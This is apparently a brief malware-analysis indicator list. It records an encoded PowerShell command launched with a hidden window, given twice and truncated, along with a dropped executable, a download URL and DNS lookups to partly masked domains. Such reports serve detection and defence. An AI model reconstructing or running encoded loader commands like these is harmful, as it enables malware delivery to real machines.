Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGEAaQBqAGIAcABwAGwAbABkAD0AJwBSAGIAagBrAHMAegBmAGcAbQBhAGEAbQBkACcAOwAkAFgAeABtAGsAZQBqAHAAagAgAD...
- %HOMEPATH%\735.exe
- http://xn#####c1bdfb.com.ua/wp-includes/iKdeWcRji/
- DNS ASK sp###edesign.eu
- DNS ASK xn#####c1bdfb.com.ua
- DNS ASK re##pt.site
- DNS ASK ca##erbd.tk
- DNS ASK to###artires.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGEAaQBqAGIAcABwAGwAbABkAD0AJwBSAGIAagBrAHMAegBmAGcAbQBhAGEAbQBkACcAOwAkAFgAeABtAGsAZQBqAHAAagAgAD...' (with hidden window)